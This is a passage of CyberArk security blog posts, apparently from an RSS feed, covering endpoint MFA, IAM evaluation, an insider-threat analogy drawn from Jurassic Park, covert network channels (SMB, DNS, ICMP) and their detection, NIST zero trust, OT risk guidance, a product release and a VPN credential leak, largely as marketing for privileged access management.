Think about it. Many of the apps you use on your laptop don’t ask you for credentials, especially if your organization doesn’t have strong multi-factor authentication (MFA) policies. Your app passwords may be cached in your browser for convenience, but this also makes them an easy target for credential theft attacks. If your organization uses certificate-based authentication or iWA as a practice for convenience, most of the apps would be directly accessible from a trusted device, without any authentication challenge. Considering that even a mid-sized company may use more than 100 SaaS applications, imagine the extent of damage one can do with access to even a few of these applications.

Even though the world is moving towards cloud storage, some workers like to store copies of important, sensitive files using One Drive, Box or Dropbox. Employees who are constantly on the move, such as sales folks, like to keep critical information locally, as they may not always get access to cloud. Such files may contain sales leads, financial information, partners information, code, trade secrets, and so on.  Worst case, a careless employee may have stored his passwords in a spreadsheet.

In addition to sensitive corporate data, an average laptop may contain several files with personal information of the owner, such as their address, phone number, email, SSN, bank account information and credit card details. In the wrong hands, these vital financial records can be used for identity theft.

What’s more, email clients such as Outlook are typically in an “always open” state, putting them at risk. Employee email addresses can often be used to reset passwords for various services, plus emails themselves often contain sensitive information about the employer. Using social engineering, attackers can use one employee email to procure sensitive information about other employees.

In short, it could be disastrous if even one of your employees loses their laptop. Without strong enterprise password policies in place, chances are good that the password is weak and won’t even withstand a basic brute force attack.

Malicious insiders also target unsecured laptops, looking to steal valuable information colleagues or senior executives, or gain privileged access to corporate systems and data they don’t have rights to. Insider threats are increasing in frequency, and can be particularly dangerous as they can go undetected for weeks, months – or even years.

So, it’s absolutely essential that work (and even personal) laptops are protected with strong MFA on the boot screen and lock screen. Not doing so would leave a dangerous gap in your organization’s digital security.

To address this pain point, CyberArk Idaptive cloud agents support strong MFA for boot screen and lock screen of Windows and macOS devices with features such as:

  • Risk-based adaptive MFA
  • Support for MFA on RDP/RDS access to Windows servers
  • Self-service password reset based on authentication challenges to minimize IT helpdesk support and costs
  • MFA for offline devices, with the ability to lock and wipe Windows and macOS devices if they are stolen
  • Flexible authentication factors, such as OTP, SMS, email, mobile push, FIDO2 keys (such as Yubikey), etc.

Endpoints pose significant security risks for today’s digital businesses – especially with the current large remote workforce. Savvy attackers can exploit endpoint vulnerabilities to steal confidential information or disrupt IT services. By taking a defense-in-depth approach to endpoint security – instituting a strong mix of security controls from MFA to privileged access management – you can strengthen overall security posture and reduce exposure.

To learn more about securing remote users, endpoints and critical assets, visit our Risk Distancing Resource Center.

]]>
Simple Rules for Smart IAM Solutions – Part 1 https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions/ Fri, 25 Sep 2020 17:36:33 +0000 https://www.cyberark.com/?p=99378

Evaluating IAM solutions can be complex. Understanding how to evaluate security analytics is key to making decisions.

In this day and age of Machine Learning (ML), analytics systems can become very complex, very quickly. Having some basic rules and seemingly simple questions to ask will come in handy when evaluating such systems. In this blog, I’ll lay down some basic rules which will help in evaluating and choosing the right IAM and MFA solutions, especially if you’re looking for solutions based on User and Identity Behavior Analytics (UEBA/UBA), Identity Analytics, or general Security Analytics. So, let’s dive in!

Security Analytics is all about generating insights by collecting, preparing, and analyzing data from various sources. With these insights, automated responses are orchestrated that can help IT and security teams stay ahead of malicious actors and attacks to mitigate risk. Traditional Security Intelligence tools have largely focused on collecting logs and event data from networking and infrastructure sources to generate those insights and automate responses. However, in today’s perimeter-less world, where Identity is the only true perimeter, adopting a Zero Trust approach to reduce risk requires these systems to leverage the rich information generated within Identity and Access Management systems and embrace the concept of User Behavior Risk.

Consequently, Identity and User Behavior Risk analytics needs to be a key component of any security analytics strategy, which involves intelligently protecting access to critical resources from potentially risky users. Pretty much all Identity Access & Management (IAM) tools these days claim to be able to adapt to risky situations and offer some sort of “adaptive risk access” through identity and user behavior analytics. It then becomes challenging to differentiate between these tools, especially given all the technical complexities coming with the various mechanisms that can be deployed when analyzing data, for example, Rules engine and Machine Learning. IT and security personnel tasked with analyzing and testing these tools therefore must consider the following simple, yet powerful rules of thumb when analyzing such tools.

Remember – The more contexts, the more the fidelity and reliability of the tool. If you have garbage going in, you will have garbage coming out.

Analytics is all about quality of data, its comprehensiveness, and the data science that drives how well it is analyzed (also known as the Model). Quality refers to how well cleaned, prepared, and wrangled the data is for downstream consumption. Comprehensiveness refers the various contexts and sources from which the tool collects data from. By “how well,” it means not just the quantity of data but also what algorithms, encoding and normalization techniques are used to efficiently and accurately extract identity behavior and assess for risk in a continuous manner from an optimally sized dataset.

This is critical especially when dealing with large volumes of data over a lengthy period of time. For example, when a user accesses an app, he/she uses an endpoint device (such as a mobile phone), from a location, traverses a network comprising firewalls, gets authenticated, assumes a role, and then performs some activity. A good IAM tool is able to gather information from all of these contexts (device, location, time, network, directory services, roles-based access etc.) and then “learns” about access patterns over a period of time.

Automation is key.

Okay, so you are able to “intelligently” and “continuously” gain visibility into the various behavioral patterns of identities, but are you also able to protect the critical resources that may be under attack? And what does protection entail? Here again, remember the various contexts. A good tool is able to protect the end point, step up authentication and employ the strictest of assurance levels through Multi Factor Authentication (MFA), limit access through coarse grain Roles Based Access Control (RBAC) and fine grain entitlements management and log malicious activity and notify the right admins and users. And all of this happens seamlessly and “automatically”.

Automation goes hand in hand with Orchestration.

The right IAM tool is able to “Orchestrate” with other key IT and SIEM tools such that other workflows and remediation methods may be invoked in an automated way leveraging such technologies as webhooks, APIs and exchanging information through standard event formats and programmatic interfaces.

UBA based continuous authentication must lead to better end-user experience!

Deploying this tool must not come at the cost of user experience. Period. One of the most significant challenges that IT and Security teams face these days is protecting the identity perimeter while keeping the good identities happy! Continuous risk assessment and stepping up security only when required is a must then, and the tool must offer this through the right policy knobs, which can go fine grain to the application level.

Now that the rules have been established, do visit our product portfolio and sign up for a free trial to see how Idaptive will help you address and achieve these through our UEBA based adaptive MFA and Access Management solutions.

Part 2 in this series

Part 3 in this series

]]>
Prehistoric Security Controls: Deconstructing the Jurassic Park Insider Threat Incident https://www.cyberark.com/blog/prehistoric-security-controls-deconstructing-the-jurassic-park-insider-threat-incident/ Thu, 24 Sep 2020 12:59:30 +0000 https://www.cyberark.com/?p=102970 Cyber attackers are hitting organizations from every angle — and, increasingly, from inside. According to a 2020 Ponemon Institute study, the frequency of insider threat incidents spiked by 47% since 2018 and the average annual cost to organizations rose by 31% to $11.45M.

While the majority of insider threats can be attributed to employee mistakes or negligence, malicious insiders (i.e. employees or third parties who abuse legitimate access to company systems for nefarious purposes) are difficult to spot. They often operate under the radar for long periods of time and, with the right resources, can take down organizations both large and small. While they’re getting worse in number, insider threats are nothing new.

In the spirit of National Insider Threat Awareness Month this September, here’s a deconstruction of the infamous “Jurassic Park” incident.

The Definition of a Malicious Insider

Dennis Nedry, the lead computer programmer for Jurassic Park, could not meet the profile of a malicious insider more perfectly. Nedry was extremely motived to bring John Hammond’s beloved park into extinction (pun). He’s a disgruntled employee who feels under-appreciated for his work. His motivation was mainly driven by financial gain. It’s teased early on in the story that he’s in some sort of financial trouble, which likely drove him to sell out to Hammond’s biggest competitor for a payout of $1.5M (equivalent to $2,676,093.43 in 2020). Nedry had approximately 18 minutes to shut down security systems, retrieve over a dozen healthy dinosaur embryos and make his way to the east dock to escape the island and collect his fee.

So how does he do it?

From the movie, we know the park’s control room is equipped with Macintosh Quadra 700s – best-in-class computers in the early 90s. In one scene, the camera zooms in on Nedry’s computer screen, providing a glimpse at three different shells written in an object-based programming language developed by Apple. Believe it or not, someone has reviewed these shells by installing the appropriate OS on an emulator for older Apple systems. Turns out, the shells are just sample code that came with Microsoft Programmer’s Workshop (WPM).

 

 

Since these Hollywood theatrics can’t tell us anything, we’ll speculate on Nedry’s attack methodology based on how the movie plays out.

Hold on to Your Butts: An Insider Attack in Action

When chief engineer Ray Arnold tries to bring the systems back online, it’s clear Nedry covered his tracks prior to installing the malicious code. By disabling keystroke logging from the computer, Nedry made it nearly impossible to find it without manually reviewing two million lines of code.

Making matters worse, Arnold can’t crack Nedry’s password to reactivate the security systems. His only remaining option is to perform a manual reboot, which in theory would bring the systems back online – and we all know how the rest of the movie goes.

Let’s dig in a bit deeper and try to break down Nedry’s attack methodology. From the dialogue, we know he is a skilled programmer. He initiated the whte_rbt.obj command from his workstation, which is a piece of code mislabeled as an .obj file type that launched a backdoor attack. Since the same privileged credentials were likely used throughout park systems, the malicious command propagates throughout the park.

To inject this malicious code, Nedry had to do one of the following:

  1. Write the code onsite, make it executable and run it in an administrative context from his workstation. With his over-provisioned administrative access rights and the park’s poor credential management practices (default password use and credential reuse), we can assume this is a likely scenario.
  2. Transfer the code from an outside location via removable media, such as a USB drive. Without restricted access policies in place, he could execute malicious code from the Internet.

 

 

Privilege was everywhere in Jurassic Park. The central mainframe communicated with all the operational technology components within the park. Because of this, Nedry had complete and total control over not only the digital environment, but the physical infrastructure of the facility including CCTV, doors and, of course, the fences to the dinosaur pens. Judging by personal photos on Nedry’s device, we can assume he is authenticated to all of these systems from his workstation, which has access to external networks and unrestricted removable media — a huge no-no in OT environments, even in the 90s.

Bottom line, there was little to no separation between Nedry’s device (an IT asset) and the critical OT systems in the park. As we recently explored, attackers with access to OT assets can corrupt or shut down critical systems and even put human health and safety in danger. It’s not just science fiction: many of today’s energy, utility and manufacturing facilities rely on these controls to protect their data, employees and customers.

Attackers, Uh, Find a Way: Protect What Matters with Privileged Access Management

Although it takes away from the thrill and excitement of the movie, with the right privileged access management controls in place, Jurassic Park could still be standing.

Beyond standard privileged account and credential management (i.e. vaulting and rotation), the park would’ve benefitted from basic cybersecurity best practices such as implementing the principle of least privilege and attestation for privileged tasks. These would have restricted Nedry’s unchecked privileges to the minimum levels of access, or permissions, required to do his job.

Privileged session management and threat detection capabilities would’ve enabled session suspension and termination when suspicious activities or commands were executed, while maintaining a full audit trail. Additionally, strong application control would’ve ‘deny-listed’ unknown applications and removable media from running, stopping the spread of malicious code throughout the environment. By enforcing these controls, Nedry would not have been able to access multiple systems via a single application and from the same terminal.

Even if Nedry did gain access legitimately using a system like CyberArk Core Privileged Access Security, he would’ve had to enter commands in one at a time. With single, centralized access in place for all systems and endpoints, command restriction and analytics would’ve flagged early warning signs — or terminated his access outright.

Just as life finds a way in Jurassic Park, motivated attackers will find a way – and they are far from the comic relief that Nedry brought to the comparative levity of his actions. In today’s digital world, you must anticipate that malicious characters — both inside and outside your organization — will gain some level of access into IT, OT and even cloud environments. CyberArk solutions are focused on stopping attackers from ever reaching their end target by placing strong privileged access controls around critical resources. Securing privileged access is not chaos theory. Check out our Privileged Access Management Boot Camp or request a demo to get started.

]]>
Your Network Through the Eyes of a Hacker https://www.cyberark.com/blog/your-network-through-the-eyes-of-a-hacker/ Tue, 22 Sep 2020 14:01:54 +0000 https://www.cyberark.com/?p=100439 I’m sure your network’s security is top-notch.

You must have already taken care of micro-segmentations, strict firewall policies, and have some kind of EDR solution on the different endpoints. And of course, you’re only allowing secure connections that rely on encrypted protocols.

If you are one of those who take security seriously, you might even run a regular security update routine. And if that’s not enough, you probably also have a qualified SOC team that monitors all of those systems 24/7. Your SOC team submits a report each week that shows several security events that appeared in the different systems but were all examined and characterized as false-positives.

Having said all that — do you feel secure?

In this post, you’re going to learn three stealthy attack techniques you should anticipate and work to avoid. More than that, it’s important that you learn how to expand this knowledge in a way that allows you to protect your network. In order to do that, we will first dive into the mind of a hacker and understand their strategy.

As a white-hat hacker and former red teamer, I can tell you that one of my main goals in an operation is to stay secretive. Staying secretive is an important ingredient of an APT (Advanced Persistent Threat) attack, which features a stealthy threat actor.

The Art of Cyber Warfare

If I had to highlight one key feature of a skilled attacker, it would be patience.

“If it is to your advantage, make a forward move. If not, stay where you are.” – Sun Tzu, The Art of War

An attacker who succeeded in passing your first line of defense and gained initial access will strive to evade existing defense systems. They will not make a move until they are certain about it. And more than that, when they do make a move — they will make sure that you are unaware of it.

“Make your way by unexpected routes and attack unguarded spots.” – Sun Tzu, The Art of War

Strolling in the Dark

It all depends on the attacker’s intelligence data.

The easy scenario is when the attacker has enough information to make a decision about their moves and plans ahead.

The more problematic scenario is when there’s not enough intelligence data. In this situation, the best way for an attacker to remain under-the-radar is to utilize the “must-have” features of an organizational network, such as shared folders, ping messages, and DNS queries.

Why would an attacker use those? Because these are protocols that are very frequently used, so it doesn’t require pre-operation intelligence. They shed light on unknown paths.

Even if one of your defense systems catches something unusual, chances are your SOC team will have a hard time investigating exactly what happened. Searching for an unusual pattern in the network traffic of these protocols is like looking for a needle in a haystack.

In the upcoming section, I’ll explain 3 examples of common protocols used by an attacker to their advantage:

1. SMB protocol — enables the shared network folder

2. DNS protocol — enables the translation of domain names to IP addresses

3. ICMP protocol — enables, inter alia, sending ‘ping’ messages

SMB and Shared Network Folders

It’s a common feature of most networks to have some kind of a shared drive, to allow users to share files with each other and to have a backup of a locally saved file.

This service will be open, most of the time, to a wide range of users and systems. It can, therefore, be used as a tool for breaking down your micro-segmentation and firewall rules.

The way a hacker would use a shared drive is by creating a file in a shared folder that will act as a “pipeline” between a Command & Control (C&C) server and an agent. Even if the agent is running on a machine that isn’t allowed to speak with the C&C, it’s more than likely that the two of them can find a shared folder where they can share such a “pipeline” file with each other.

Figure 1. Breaking network segmentation using shared network folders

DNS Beacons

DNS beacons are a well-known technique used to hide the payloads of a session between a C&C server and its agents.

It uses the DNS protocol to bypass firewall rules and relies on the massive amount of DNS queries to “blend into the crowd”.

How does it work?

The agent sends a DNS query to the local DNS server. The query looks like a machine asking for a domain name translation, when in fact, the name server that answers those queries is controlled by the attacker.

In this way, the attacker can respond with any desired payload, in the DNS TXT type record for example, and that will reach the agent.

Figure 2. Bypassing firewall rules using DNS queries

Just imagine your crown jewel DB server, leaking the most valuable information, drop by drop, one DNS query after another.

ICMP Tunneling

Last but not least is a simple technique in which a hacker uses the payload section of the ICMP ping packet in order to pass whatever payload they would like.

Regular Linux ping echo message:

Figure 3. Ping echo message

Manipulated ping echo message:

Figure 4. Manipulated ping echo message

Ping packets are mostly allowed to pass between different endpoints on the network. It’s an everyday tool that IT teams use to troubleshoot network faults — that’s exactly why it’s a great way to bypass network policies.

Similar to SMB and DNS, the amount of ICMP packets sent on the network is huge, making this method hard to detect.

So, what can you do against these types of attacks?

Keep your enemies close, but your friends closer — using a firewall to filter the types of traffic that you don’t use is the easy part. But what are you going to do with the traffic you allowed to pass?

Two main methods worth pointing out that can help address these challenges are:

1. Deep Packet Inspection (DPI) — as a security feature in your network can go a long way to detecting the malicious use of packets to transfer payloads, such as DNS beacons and ICMP tunneling

2. Behavioral-based security — an automated proactive approach, in which you can detect behavioral anomalies in your network, such as 2 machines going back and forth from the same file on a shared folder (sound familiar?)

The most important issue here is that you need to embrace the perspective of an attacker on your network.

Look for the properties on the network that are “obvious,” the trivial types of traffic, and those that are difficult to filter out the unusual patterns.

Good luck!

]]>
Put Privileged Access Management at the Core of NIST Zero Trust Architecture https://www.cyberark.com/blog/put-privileged-access-management-at-the-core-of-nist-zero-trust-architecture/ Tue, 15 Sep 2020 12:30:58 +0000 https://www.cyberark.com/?p=98787 In our mobile, cloud and digital world, physical perimeters have all but disappeared. Gone are the days when users and assets resided within the physical walls of the organization and trust was defined by the perimeter. Today, it’s impossible to contain — let alone trust — all of the people, machines and applications that must dynamically access company systems and data, so Zero Trust models are becoming more popular. Zero Trust, as the name suggests, means anyone and everything trying to connect to an enterprise system is verified before access is granted.

Of course, shifting from perimeter-centric security to Zero Trust is an evolution that takes time, along with a measured, risk-based approach across people, process and technology domains. For those looking to get started with a Zero Trust program, the National Institute of Standards and Technology (NIST) offers insights for building Zero Trust Architectures (ZTAs). Within NIST SP 800-207, the organization outlines 11 logical components within an ideal ZTA, along with migration and threat mitigation strategies and use cases.

Each of these components are meant to limit access to strongly verified identities to protect the integrity of enterprise resources and provide complete audit trails.

Here’s a look at the full architecture:

Source: NIST SP 800-207. Core Zero Trust Logical Components

The Core of the NIST Zero Trust Architecture

Three components — the policy engine, policy administrator and policy enforcement point — comprise the core of an enterprise Zero Trust architecture. The policy engine makes the ultimate decision to grant access to the human, machine or application user based on enterprise policy, input from external sources (such as the continuous diagnostic mitigation system or threat intelligence services) and a trusted algorithm. More on that algorithm in a minute.

The policy administrator is responsible for establishing or shutting down the communication path between the user and the target resource. Once it receives the policy engine’s ultimate approval to grant access, it commands the policy enforcement point to initiate a session through the credential, key or token used by the user to access the enterprise resource.

Meanwhile, the policy enforcement point acts as the gatekeeper for the communication path. It is responsible for enabling, monitoring and terminating sessions (when necessary) between the human, machine or application and the target enterprise resource.

A Trust Algorithm to Rule Them All

Because these three core systems are inextricably connected, NIST recommends instituting a trust algorithm, which is built on observable (entity and enterprise system) information in the ZTA. It builds on data access policies and is refined via the organization’s threat intelligence feed(s).

NIST recommends that controls put in place to grant access to systems be responsive not only to policies, but also to an overall trust score that can influence policy evaluation. This score can be calculated through a single evaluation of the algorithm, or it can dynamically change over time based on things like entity behavior patterns.

Eight Data Sources Drive Zero Trust Access Decisions

NIST’s remaining eight logical ZTA components are data sources that provide critical input and policy rules to the core and enable the appropriate access decision. These include:

  • Public key infrastructure generates and logs certificates issued by the enterprise to resources, subjects, services and applications.
  • Identity management provides a good baseline for a higher degree of trust around entities, through the use of identity proofing.
  • Data access policies provide a domain of understanding and controls around what is acceptable behavior for the entities.
  • Continuous diagnostic mitigation (CDM) system monitors, reports and corrects on the integrity of systems in the enterprise architecture and relies on support the threat intelligence feed(s).
  • Threat intelligence feed(s) provides information from internal or external sources, such as information on newly discovered attacks or vulnerabilities, to help the policy engine make access decisions.
  • Industry compliance, security incident and event monitoring (SIEM) system, and network access and activity logs serve to collectively audit and track events and activities, providing analysis or reporting on the access records.

Stand Up Your Zero Trust Architecture with Privileged Access Management

While there are several ways enterprises can get started with Zero Trust, strong privileged access management controls are essential to establishing NIST’s three core architectural components.

Policy engine. Privileged access management solutions enforce authentication and authorization policies for privileged users leveraging enterprise policy and analytic algorithms that track behavioral patterns. Anomalous behavior, such as requesting access from a new location or outside of normal business hours, can trigger alerts so incident response teams can take immediate action.

Policy administrator point. By establishing isolation layers between endpoints, users and target systems while continuously monitoring access, privileged access management solutions secure the communication path between privileged users and target resources. This means you’ll know who gained access, what that user accessed, and exactly when (and for how long) the access was granted.

Policy enforcement point. Privileged access management helps you remediate risky behavior by automatically suspending or terminating privileged sessions based on risk assignment. It can also initiate automatic credential rotation in the event of privileged credential compromise or theft, and keep a full audit record to simplify compliance and aid remediation, when necessary.

Privileged access management solutions are designed to protect your most critical systems and assets — the core of your enterprise. With the right tools, you can grant access to strongly verified identities and leverage integrations with leading security solutions to optimize access policies.

By encompassing the key elements of Zero Trust — verification and monitoring — privileged access management empowers organizations to prevent credential theft, stop lateral movement, limit privilege escalation and abuse, and ultimately, protect what matters most.

Learn more in this on-demand webinar and tap into the CyberArk Blueprint for Privileged Access Management Success for prescriptive guidance on designing core ZTA workflows.

Editor’s Note: Thanks to Carlos Condado who contributed to this blog post.

]]>
NSA and CISA Urge Action to Reduce Operational Technology Risk https://www.cyberark.com/blog/nsa-and-cisa-urge-action-to-reduce-operational-technology-risk/ Wed, 09 Sep 2020 14:14:26 +0000 https://www.cyberark.com/?p=98530 The critical infrastructure that underpins our modern way of life continues to be under attack. The 2015 hack of Ukraine’s power grid brought this sobering reality into focus, and since then, threats have continued to grow in number and sophistication. In recent months, attackers doubled down on energy companies, water facilities, and more, often exploiting internet-connected operational technologies (OT) to reach into industrial control systems.

As a result, the U.S. National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert recommending actions to reduce exposure across operational technologies and industrial control systems (ICS). It includes guidance on securing privileged credentials, which threat actors consistently target as part of critical infrastructure attacks.

By compromising privileged credentials (or stealing user identities with access that can become privileged) and gaining admin-level access to connected OT assets, attackers can disrupt critical services, corrupt OT and IT systems, wipe out endpoints and servers, and ultimately, put human lives in danger.

OT-IT Convergence and a Growing Attack Surface

So how is OT different than IT? OT comprises the hardware and software systems that monitor and control physical equipment and processes. These are highly specialized environments, complete with proprietary technology that is unfamiliar to most people beyond the operators and engineers working with them. OT systems are often “air-gapped” or segmented from outside networks for security and availability purposes. But as companies increase remote operations and outsource numerous tasks including equipment servicing and maintenance, connectivity becomes critical, and OT and IT technologies continue to converge.

This convergence can present numerous challenges, the first being that OT systems (many of which are decades old) were simply not designed to withstand today’s highly targeted attacks. As these systems become increasingly connected, the attack surface has expanded dramatically. The potential for nation-states or malicious insiders to steal or abuse privileged credentials to gain access to critical industrial control systems is a critical concern. Moreover, publicly available open source tools like Shodan and Kamerka can be used by attackers to conduct reconnaissance, pinpoint connected OT assets and map out their mission.

Privileged Access Risk: Spotlight on the Energy Sector

Privileged accounts, and the access they provide, represent one of the most significant security vulnerabilities critical infrastructure companies face today. While this is true for all 16 critical infrastructure sectors (as defined by the U.S. Department of Homeland Security), let’s explore some specific examples of privileged access risk in the energy sector. More specifically, in substations, the physical stations that transform voltage and either transmit or distribute power to designated areas of a region:

Remote Access to Substations

Substations are widely distributed around a region and are typically unattended. They rely on supervisory control and data acquisition (SCADA) for remote access, supervision and control. This requires connectivity. In the case of the Ukraine attack, threat actors opened breakers at 30 distribution substations. They did this by capturing privileged accounts from infected workstations, moving laterally through the IT environment, escalating privileges and setting up back doors to ensure persistence. Then, they used this elevated access to VPN from the IT environment into the OT environment, which was not properly air gapped.

Having a privileged access management (PAM) program in place to help protect against this type of risk is paramount. PAM is also an important security control to help ensure remote workers have only the necessary levels of access to OT machines and sensitive information to do their jobs — and nothing more — while enabling continuous visibility of all privileged activity and rapid response to anomalous behavior. (You can learn more about this in our recent blog post “Security for the Modern IT Environment.”)

Insecure Substation OT Devices

The OT equipment found in substations — including switchyards, switches, circuit breakers and transformers — are all created with a default security password, known as a standard PIN. This equipment is used for years, and often, the factory-issued standard PIN is never changed. Making matters worse, these PINs are easy to find through a quick Google search. Attackers know all of this. If they can gain access to a connected substation, they can easily abuse these hardcoded passwords to disable or corrupt critical OT devices and systems.

Five Steps for Protecting Privileged Access in OT Environments

While there is no silver bullet for OT cybersecurity, fundamental privileged access management controls can help protect against threats and dramatically reduce the impact of an attack.

The NSA and CISA offer guidance on securing identities and privileged credentials in OT environments. As part of a detailed mitigation strategy, they recommend critical infrastructure facilities “secure all required and approved remote access and user accounts” by following five steps:

1. Prohibit the use of default passwords on all devices, including controllers and OT equipment.

Our take: This should be the first thing you do after onboarding a new OT device in the environment. Same goes for the connected IoT devices in your home such as routers or printers — especially if you are working remotely.

2. Remove, disable or rename any default system accounts wherever possible, especially those with elevated privileges or remote access.

Our take: After you do this, identify the users that require privileged and/or remote access — or users that could become privileged under certain conditions — and implement strong controls that keep these users productive, but also secure.

3. Enforce a strong password security policy (e.g., length, complexity).

Our take: A significant part of effective enforcement is a strong and consistent approach to educating employees about cybersecurity risks and the fundamental importance of protecting passwords.

4. Require users to change passwords periodically, when possible.

Our take: Even better, take the onus off of the user by storing all privileged account passwords and credentials in an encrypted repository. Then automatically rotate these credentials based on policy to streamline admin and user workflows.

5. Enforce or plan to implement two-factor authentication for all remote connections.

Our take: Recently highlighted in our Twitter attack deconstruction, an account is more than 99.9% less likely to be compromised if MFA is in place. Mandating MFA should be table stakes.

The NSA and CISA also urge critical infrastructure facilities to “implement a continuous and vigilant system monitoring program” that enables anomaly detection. This can help organizations identify malicious cyber tactics like “living off the land,” where attackers abuse privileged access to gain network persistence, pose as authorized users and then utilize native tools or features existing in the OT environment to accomplish their mission.

As OT and IT systems become increasingly intertwined, critical infrastructure companies must make privileged access management a priority to combat highly organized, well-funded attackers. For more information on CyberArk’s approach to securing privileged access across OT environments, visit here.

]]>
CyberArk Extends Cloud Deployment Options, Improves Simplicity and Scalability with v11.6 https://www.cyberark.com/blog/cyberark-extends-cloud-deployment-options-improves-simplicity-and-scalability-with-v11-6/ Thu, 27 Aug 2020 14:30:45 +0000 https://www.cyberark.com/?p=98188 “Change is the only constant in life” is a well-known adage first attributed to the Ancient Greek philosopher Heraclitus of Ephesus. While the world has evolved dramatically since Heraclitus’ day, this quote continues to ring true.

Fast forward to the summer of 2020 and everything feels in continuous flux. From a business and IT perspective, organizations have moved quickly to support their remote workforce and are continuing to explore new cloud-based solutions to help their organizations stay productive. Meanwhile, attackers are preying on global uncertainty and are specifically targeting these new enabling technologies, hoping to take advantage of misconfigurations and unknown vulnerabilities.

As security teams continue to adjust to the new normal, keeping their CyberArk privileged access management (PAM) deployments up to date with the latest enhancements is an important step to stay one step ahead of the attackers. So let’s take a look at some of the new features we’ve released in the CyberArk Privileged Access Security Solution version 11.6 (v11.6) to help security teams achieve security at scale in a changing landscape.

Vault Deployment – Have PAM Your Way with a Hybrid, Single or Multi-Cloud Deployment

As the volume of cyber attacks continues to increase, most attackers continue to rely on the exploitation of privileged credentials. As the attack surface grows with remote work environments and expanded cloud deployments, organizations are turning to PAM solutions that help prevent credential theft, stop vertical and lateral movement, and limit privilege escalation and abuse. Maintaining the availability of key PAM processes is an important element of a defense in-depth strategy.

With v11.6, CyberArk now supports Vault deployments in hybrid cloud architectures, in which Vaults are deployed between on-premises data centers and AWS or Azure cloud-based data centers for increased availability.

For example, organizations can now deploy their primary Vault on-premises while locating their Disaster Recovery Vault in their cloud environment, or vice-versa.

CyberArk customers can now optimize their Vault deployment for their specific environment: entirely on-premises, in a hybrid cloud environment, across different regions or availability zones in a single cloud provider network, or in a multi-cloud AWS and Azure architecture.

As many of our customers adopt software as a service (SaaS)-based approaches to their technology stack, CyberArk Privilege Cloud, our PAM as a Service solution, is an increasingly popular option. With CyberArk Privilege Cloud, failover between availability zones for the vault is offered as part of the service.

New Bulk Upload Features and REST APIs Simplify Onboarding and Discovery

Version 11.6 also introduces two new features to improve reporting and onboarding capabilities.

First, a new bulk upload feature makes it faster and easier to onboard privileged accounts, such as Windows and Linux admin accounts and SSH keys, supporting organizations as they scale their PAM solutions to secure more of their workloads. The bulk upload method reduces the time required to onboard accounts by 50% compared to existing REST API scripts, and by 75% compared to the Password Upload Utility.

Additionally, new REST API scripts provide users increased insight and detail on the status of privileged account discovery and onboarding. CyberArk administrators can measure the success and progress of discovery and onboarding efforts, enabling them to demonstrate the ROI of PAM efforts back to the business. The bulk upload method and new REST API scripts will be available for CyberArk Privilege Cloud in 2020 Q4.

Together, these new tools improve time to value and reporting capabilities for PAM deployments, allowing businesses to tackle complex PAM projects without sacrificing user experience.

Privileged Threat Analytics Scale Improvements and Deployment via Azure Resource Manager

In v11.6, we’ve also improved the scalability of key threat detection capabilities within the CyberArk Core Privileged Access Security solution. Each server running CyberArk’s threat analytics capabilities now analyzes up to 3,000 syslog events per second to detect risky and malicious privileged behavior —representing a 75% improvement in scalability.

In addition to the increased scalability, v11.6 also includes a Microsoft Azure Resource Manager (ARM) template, enabling customers to automatically deploy CyberArk privileged threat analytics capabilities in their Azure environments. Organizations can now deploy the related threat analytics infrastructure on-premises, in AWS or in Azure.

Learn More About CyberArk Privileged Access Security Solution v11.6

In today’s “new normal,” IT infrastructures are everything but. Organizations everywhere need security solutions that scale and allow them to confidently navigate change during their digital transformation journeys. At CyberArk, we’re committed to providing these solutions.

To learn more about CyberArk v11.6, contact us for a demo.

]]>
Time to Re-examine Remote Access After VPN Password Leak https://www.cyberark.com/blog/time-to-re-examine-remote-access-after-vpn-password-leak/ Wed, 12 Aug 2020 15:35:05 +0000 https://www.cyberark.com/?p=97826 Privileged Access Management

Just days ago, a list of plaintext usernames, passwords and IP addresses for more than 900 Pulse Secure VPN servers was published online along with SSH keys for each server, a list of all local users and their password hashes, admin account details, last VPN logins and VPN session cookies.

So how did attackers get their hands on the information?

The leaked list also highlighted each VPN server’s firmware version and as it turns out, all listed servers were running an older version that is susceptible to CVE-2019-11510 – an arbitrary file reading vulnerability.

Researchers believe that the attackers responsible for this leak scanned for all IPv4 internet addresses and then exploited the vulnerability to gain access to each company’s sensitive systems and server details. Based on timestamps, the information was collected between June 24 and July 8, 2020.

At the time of the scan, 617 out of the 913 unique IP addresses published were still vulnerable to CVE-2019-11510, despite the vulnerability having been made public in August 2019 and customers urged to immediately apply the patch and change their passwords.

It’s Time to Re-examine Remote Access

 VPN server usage has skyrocketed with the rise in remote work — one study points to a 124% increase in March 2020 alone. More than ever, employees and third parties alike rely on VPNs to access corporate networks from remote locations and, in some cases, gain privileged access to critical business systems and applications to do their jobs. However, VPNs provide network access and aren’t designed to provide privileged access to critical internal systems.

The increased reliance on VPNs has grabbed the attention of attackers as they look to take advantage of the dynamic environment the global pandemic has caused – and many have been successful.

By exploiting vulnerabilities in VPN servers and gaining access to sensitive systems, these threat actors can deploy ransomware, encrypt entire networks and demand huge payments. Today in the United States, the average ransomware demand is $84,000 and incidents typically result in 16 days of downtime — at a conservative estimate of $10,000 per day.

While VPNs have traditionally served an important role, this high-profile leak and other recent breaches underscore the need for organizations to reexamine how they provide remote access to the most sensitive aspects of their corporate network.

 When exploring ways to connect remote employees and vendors, it’s important to strike the right balance between security and usability. Doron Naim, cyber research group manager at CyberArk Labs notes that advances in Zero Trust access, which provides granular access to a specific critical system instead of the whole network; biometric multi-factor authentication (MFA) and just-in-time provisioning are making it possible for organizations to achieve this balance without costly tradeoffs. Such approaches, combined with privileged session isolation and management, could eliminate the need for a VPN altogether in some cases, and with it, the associated operational burden on IT admin teams.

The traditional perimeter is gone. As many employees continue to work remotely and organizations rely heavily on outsourced operations, the time is now to find innovative ways to grant secure privileged access to remote users without disrupting operations. To learn how CyberArk is tackling this challenge with privileged access management (PAM), visit here.

]]>
The Gartner 2020 Magic Quadrant for PAM is Here! https://www.cyberark.com/blog/the-gartner-2020-magic-quadrant-for-pam-is-here/ Mon, 10 Aug 2020 15:32:38 +0000 https://www.cyberark.com/?p=97793 Privileged Access Management

Today, we announced that CyberArk has been named a Leader in the Gartner 2020 Magic Quadrant for Privileged Access Management.1 CyberArk was positioned both highest in ability to execute and furthest in completeness of vision, for the second time in a row.

First and foremost, we want to thank our customers, partners and employees for being the foundation of our success. You are what motivates us, every day.

